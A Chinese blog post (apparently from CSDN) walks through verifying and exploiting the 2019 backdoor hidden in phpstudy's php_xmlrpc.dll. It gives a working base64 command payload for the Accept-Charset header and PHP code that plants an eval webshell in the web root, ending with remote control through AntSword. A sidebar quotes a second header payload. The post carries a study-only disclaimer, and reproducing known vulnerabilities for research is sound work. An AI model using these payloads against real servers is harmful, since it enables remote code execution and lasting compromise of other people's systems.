【漏洞复现】phpstudy隐藏后门漏洞的验证与利用

最新推荐文章于 2022-03-07 09:31:57 发布
最新推荐文章于 2022-03-07 09:31:57 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: 漏洞复现 文章标签: phpstudy webshell 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kongzhian/article/details/120293751
版权

目录

1 背景

2影响版本

3 漏洞验证与利用

3.1验证

3.2利用:写入webshell

1 背景

phpstudy是国内第一款php后端开发调试集成软件,其将php、apache、mysql、phpmyadmin等集成在一起一次性安装,使用者无需在配置上面花太多时间。

2019年杭州警方在净网2019行动后发布了phpstudy存在隐藏后门的漏洞

2影响版本

phpstudy2016 

--php/php-5.2.17/ext/php_xmlrpc.dll

--php/php-5.4.45/ext/php_xmlrpc.dll

phpstudy2018

--PHPTutorial/php/php-5.2.17/ext/php_xmlrpc.dll

--PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll

手工验证:

直接用笔记本打开涉事文件,搜索@eval

3 漏洞验证与利用

3.1验证

访问一个php网址,burpsuite抓包

修改请求头

Accept-Encoding: gzip,deflate
accept-charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

c3lzdGVtKCdpcGNvbmZpZycpOw==利用语句system('ipconfig');的base64编码(注意有分号)

而且Accept-Encoding: gzip,deflate里逗号后的空格去掉才能利用成功

 3.2 利用:写入webshell

首先看一下当前所在文件目录,即system('dir')

熟悉phpstudy的人很容易知道,应该把webshell写入在PHPTutorial\WWW\下

我们尝试将<?php @eval($_GET['x']) ?>一次性写入

$myfile = fopen("PHPTutorial\WWW\webshell.php", "a") or die("Unable to open file!");
$txt1 = "<?php @eval($_POST['x']) ?>";
fwrite($myfile, $txt1);
fclose($myfile);

发现会失败的,且报双引号错误。但是双引号单独写入,却不会报错。(具体原因可能是虽然写入字符串,但是后门也会执行字符串的php语句??)

所以这个时候应该将webshell分开写入

经过多次尝试(挣扎),发现想要成功写入,必须将$ _ 分开写入,才不会报双引号的错,写入语句改为:

$myfile = fopen("PHPTutorial\WWW\webshell.php", "a") or die("Unable to open file!");
$txt1 = "<?php @eval($";
fwrite($myfile, $txt1);
$txt2 = "_POST['x']); ?>";
fwrite($myfile, $txt2);
fclose($myfile);

base64编码,得出payload,手工利用一下

成功上传!!

连接蚁剑就可以为所欲为了

 

注:仅作学习交流之用,请勿违反《网络安全法》《数据安全法》《关键信息基础设施保护条例》等相关法律条例,恶意利用漏洞带来的一切后果本人概不负责

kzaaa
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PhpStudy后门漏洞实战
la-大白
10-28 4770
phpstudy后门漏洞
phpstudy_2016-2018_rce 漏洞及深度利用
m0_67189356的博客
04-16 5074
说明 内容 漏洞编号 phpstudy_2016-2018_rce 漏洞名称 RCE(Remote Command|Code Execute) 漏洞评级 高危 影响范围 phpStudy 2016 phpStudy 2018 漏洞描述 攻击者可以利用漏洞执行PHP 命令,也可以称作 phpStudy 后门漏洞描述 攻击者可以利用漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code E
phpstudy漏洞
qq_17054659的博客
01-11 6073
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
新版phpstudy文件上传漏洞靶场:21关的upload-labs安装,及404错误解决
03-07 3722
使用新版phpstudy搭建上传漏洞
php7.2 webshell,phpStudy后门分析
weixin_35927318的博客
03-18 317
问题概要有问题的版本如下phpStudy20180211版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dllphpStudy20161103版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll注:这两个官网下载的版本里,都没有发php5.3版本下存在有问题的php_xmlrpc.dll,打开时会提示存在pdb路径...
phpMyAdmin漏洞利用与安全防范
02-25
但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、...
phpstudy后门rce批量利用脚本的实
10-15
本文主要探讨了如何实针对PHPStudy后门的远程命令执行(RCE)批量利用脚本。PHPStudy是一款集成多种版本的PHP环境管理工具,但有时可能存在安全漏洞,允许攻击者通过特定的HTTP请求执行任意系统命令,这就是所谓的...
phpstudy后门版).7z
06-03
phpstudy后门版,可用于后门测试
PHPstudy后门利用脚本
最新发布
01-22
phpstudy PHPstudy后门利用脚本
phpstudy php_xmlrpc.dll后门漏洞
https://www.cnblogs.com/zpchcbd/
09-26 7153
搭建环境: phpstudy2018 php版本5.4 漏洞影响版本:5.2/5.4 漏洞利用 1、随便访问一个存在的php文件 我这里就访问index.php好了 2、进行index.php 进行抓包 再自行添加两个字段payload 执行系统命令 Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw== Accept-Encoding: gzip,def...
PhpStudy 后门分析
晓得哥的博客
09-29 1255
作者:Hcamael@知道创宇404实验室 时间:2019年9月26日 原文链接:https://paper.seebug.org/1044/ 背景介绍 2019/09/20,一则杭州警方通报打击涉网违法犯罪专项行动战果的新闻出在我的朋友圈,其中通报了警方发PhpStudy软件被种入后门后进行的侦查和逮捕了犯罪嫌疑人的事情。用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几...
phpstudy后门预警及漏洞
热门推荐
ranuy阮的博客
09-24 1万+
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量...
phpstudy页面不存在_PhPStudy之nginx 解析漏洞
weixin_39642998的博客
11-23 354
点击上方“信安前线” 可订阅0x01 简介2020年09月03日,国内安全团队监测发 phpstudy 发布了phpstudy 安全配置错误漏洞的风险通告,该漏洞等级为高危;phpStudy 存在 nginx 解析漏洞,攻击者能够利用上传功能,将包含恶意代码的合法文件类型上传至服务器,从而造成任意代码执行的影响。0x02 漏洞概述由于 cgi.fix_pathinfo=1 使用默认配置...
PHPStudy漏洞利用笔记
边城浪子的博客
09-30 794
后门名称:Phpstudy后门 威胁等级:严重 影响范围:Phpstudy 2016、phpstudy2018 后门类型:C&C、命令执行 利用难度:极易 影响范围 目前已知受影响的phpstudy版本: · Phpstudy 2016版php-5.4 · Phpstudy 2018版php-5.2.17 · Phpstudy 2018版php-5.4.45 看了...
php系统构建,增加知识: 如何使用PHPstudy为后端系统构建PHP源网站
weixin_32540913的博客
03-23 486
有时在做后台系统时需要参考一些后台模板,因此构建源网站可以发挥明显作用. 以下是使用PHPstudy构建后端源网站的步骤列表:1. 下载phpstudy,notepad ++(推荐)和navicat for mysql,百度搜索以自行下载.2. 安装phpstudy,选择安装路径和默认的启动方法,该路径是可选的(我通常将其安装在D驱动器上).图片1图片2默认启动方法已更改为Nginx&PHP.图片...
phpstudy2020安装及简单使用教程
david2000999的博客
07-04 8252
phpstudyV8.0以上使用教程 简介安装步骤配置搭建网站自己的第一个PHP程序 最新版长这样 简介 按我的理解,phpstudy是一个集成式的PHP运行环境,虽然是个软件,但他实的功能就是给PHP语言编写的脚本赋予一个可执行的环境,可以为后端程序正式上传服务器之前做调试提供良好的测试环境。 安装步骤 ...
自查phpstudy后门以及漏洞
潜心学安全的小白
10-08 1790
phpstudy事件描述自查后门漏洞环境准备漏洞利用建议 事件描述 杭州公安在9月20日发布的杭州警方通报打击涉网违法犯罪暨“净网行动2019”专项行动战果中提到,2016年发布的phpstudy版本被不法分子恶意植入后门,犯罪嫌疑人在2019年初被公安机关抓获。其利用植入的后门非法控制计算机67万余台,非法获取账号密码类、聊天数据类、设备码类等数据10万余组。受影响的用户还是比较多的。 ...
PhpStudy被人注入木马免费工具的末日来了
jenkinsli的博客
09-30 1771
很多站长在做小白的时候肯定都用过phpstudy这个工具在本地搭建一个web环境,帮助自己在本地做一个网站使用,可是这么开源免费的工具软件,被和黑客玩残了。PhpStudy是PHP调试环境程序集成包软件,这次被黑客篡改文件,危及用户几十万人,这些人可都是使用免费软件的受害者呀,很多人硬着脖子说“我就用免费的收费的不用”,在好了,免费的直接呜呼,很多人损失惨重来形容。 很多人在使用云端服务器时候...
phpstudy后门漏洞
09-06
根据引用中的信息,实际测试发phpstudy2016版PHP5.4、phpstudy2018版php-5.2.17和php-5.4.45均存在后门漏洞。 根据引用中的信息,后门代码存在于\ext\php_xmlrpc.dll模块中。通过使用notepad打开该文件并搜索@eval,如果文件中存在@eval(%s(‘%s’)),则证明漏洞存在。 根据引用中的信息,修漏洞的方法之一是从PHP官网下载原始的php-5.4.45版本或php-5.2.17版本,并替换其中的php_xmlrpc.dll文件。你可以从以下链接下载原始版本的PHP:https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip 另外,你也可以从官网下载更新最新的phpstudy软件来修后门漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [phpstudy后门预警及漏洞](https://blog.csdn.net/weixin_43886632/article/details/101294081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值